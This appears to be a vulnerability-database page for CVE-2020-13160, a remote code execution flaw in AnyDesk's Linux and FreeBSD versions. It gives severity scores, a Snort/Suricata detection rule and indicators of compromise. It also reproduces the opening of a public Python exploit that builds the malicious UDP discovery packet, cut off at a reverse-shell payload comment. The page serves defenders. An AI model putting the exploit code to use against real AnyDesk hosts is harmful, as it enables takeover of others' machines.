CVE-2020-13160
published 2020-06-09CVE-2020-13160: AnyDesk before 5.5.3 on Linux and FreeBSD has a format string vulnerability that can be exploited for remote code execution.
PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
80.55%
99.6th percentile
AnyDesk before 5.5.3 on Linux and FreeBSD has a format string vulnerability that can be exploited for remote code execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anydesk | anydesk | < 5.5.3 | 5.5.3 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
|3e d1 01| at start of UDP discovery packet
bytes↗
UDP payload bytes |3e d1| at depth 2
snort
alert udp $EXTERNAL_NET any -> $HOME_NET 50001 (msg:"ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)"; isdataat:16; content:"|3e d1|"; depth:2; byte_test:4,>,16,11,relative,big; pcre:"/^.{11}([\xC0-\xC1]|[\xF5-\xFF]|\xE0[\x80-\x9F]|\xF0[\x80-\x8F]|[\xC2-\xDF](?![\x80-\xBF])|[\xE0-\xEF](?![\x80-\xBF]{2})|[\xF0-\xF4](?![\x80-\xBF]{3})|(?<=[\x00-\x7F\xF5-\xFF])[\x80-\xBF]|(?<![\xC2-\xDF]|[\xE0-\xEF]|[\xE0-\xEF][\x80-\xBF]|[\xF0-\xF4]|[\xF0-\xF4][\x80-\xBF]|[\xF0-\xF4][\x80-\xBF]{2})[\x80-\xBF]|(?<=[\xE0-\xEF])[\x80-\xBF](?![\x80-\xBF])|(?<=[\xF0-\xF4])[\x80-\xBF](?![\x80-\xBF]{2})|(?<=[\xF0-\xF4][\x80-\xBF])[\x80-\xBF](?![\x80-\xBF]))/R"; reference:url,devel0pment.de/?p=1881; reference:cve,2020-13160; classtype:attempted-user; sid:2030348; rev:2;)- →The exploit targets UDP port 50001 — monitor for unexpected inbound UDP traffic to this port from external sources, especially with packet sizes consistent with a discovery packet carrying shellcode. ↗
- →Discovery packets begin with magic bytes 0x3e 0xd1 0x01; any UDP packet to port 50001 starting with these bytes and containing format string specifiers (e.g., %n, %x, %ln) in string fields is highly suspicious. ↗
- →The AnyDesk GUI frontend process must be running for exploitation to succeed; the discovery service alone is insufficient. Monitor for AnyDesk GUI process execution on Linux/FreeBSD endpoints. ↗
- →Successful exploitation results in a reverse shell spawned under the AnyDesk GUI user's context; monitor for unexpected outbound TCP connections (e.g., to port 4444) from the AnyDesk process. ↗
- ·The vulnerability only affects AnyDesk versions before 5.5.3 on Linux and FreeBSD; Windows versions are not affected. ↗
- ·The ET Snort rule (sid:2030348) is noted as having 'Significant' performance impact due to the complex PCRE; tune deployment accordingly.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)
suricata·2020-06-16·CVSS 9.8
CVE-2020-13160 [CRITICAL] ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)
ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 50001 (msg:"ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)"; isdataat:16; content:"|3e d1|"; depth:2; byte_test:4,>,16,11,relative,big; pcre:"/^.{11}([\xC0-\xC1]|[\xF5-\xFF]|\xE0[\x80-\x9F]|\xF0[\x80-\x8F]|[\xC2-\xDF](?![\x80-\xBF])|[\xE0-\xEF](?![\x80-\xBF]{2})|[\xF0-\xF4](?![\x80-\xBF]{3})|(?<=[\x00-\x7F\xF5-\xFF])[\x80-\xBF]|(?<![\xC2-\xDF]|[\xE0-\xEF]|[\xE0-\xEF][\x80-\xBF]|[\xF0-\xF4]|[\xF0-\xF4][\x80-\xBF]|[\xF0-\xF4][\x80-\xBF]{2})[\x80-\xBF]|(?<=[\xE0-\xEF])[\x80-\xBF](?![\x80-\xBF])|(?<=[\xF0-\xF4])[\x80-\xBF](?![\x80-\xBF]{2})|(?<=[\xF0-\xF4][\x80-\xBF])[\x80-\xBF](?![\x80-\xBF]))/R"; reference:url,devel0pment.de/?p=1881; reference:cve,2020-13160; class
Exploit-DB
AnyDesk 5.5.2 - Remote Code Execution
exploitdb·2021-03-03
CVE-2020-13160 AnyDesk 5.5.2 - Remote Code Execution
AnyDesk 5.5.2 - Remote Code Execution
---
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881
#!/usr/bin/env python
import struct
import socket
import sys
ip = '192.168.x.x'
port = 50001
def gen_discover_packet(ad_id, os, hn, user, inf, func):
d = chr(0x3e)+chr(0xd1)+chr(0x1)
d += struct.pack('>I', ad_id)
d += struct.pack('>I', 0)
d += chr(0x2)+chr(os)
d += struct.pack('>I', len(hn)) + hn
d += struct.pack('>I', len(user)) + user
d += struct.pack('>I', 0)
d += struct.pack('>I', len(inf)) + inf
d += chr(0)
d += struct.pack('>I', len(func)) + func
d += chr(0x2)+chr(0xc3)+chr(0x51)
return d
# msfvenom -p linux/x64/shell_re
Metasploit
AnyDesk GUI Format String Write
metasploit
AnyDesk GUI Format String Write
AnyDesk GUI Format String Write
The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/158291/AnyDesk-GUI-Format-String-Write.htmlhttp://packetstormsecurity.com/files/161628/AnyDesk-5.5.2-Remote-Code-Execution.htmlhttps://devel0pment.de/?p=1881https://download.anydesk.com/changelog.txthttp://packetstormsecurity.com/files/158291/AnyDesk-GUI-Format-String-Write.htmlhttp://packetstormsecurity.com/files/161628/AnyDesk-5.5.2-Remote-Code-Execution.htmlhttps://devel0pment.de/?p=1881https://download.anydesk.com/changelog.txt
2020-06-09
Published